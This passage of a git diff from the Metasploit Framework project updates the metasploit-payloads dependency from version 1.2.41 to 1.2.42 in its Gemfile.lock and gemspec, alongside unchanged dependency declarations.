4.2.6) - metasploit-payloads (1.2.41) + metasploit-payloads (1.2.42) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index bd5adc841e..e3cfbe139a 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.2.41' + spec.add_runtime_dependency 'metasploit-payloads', '1.2.42' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.14' # Needed by msfgui and other rpc components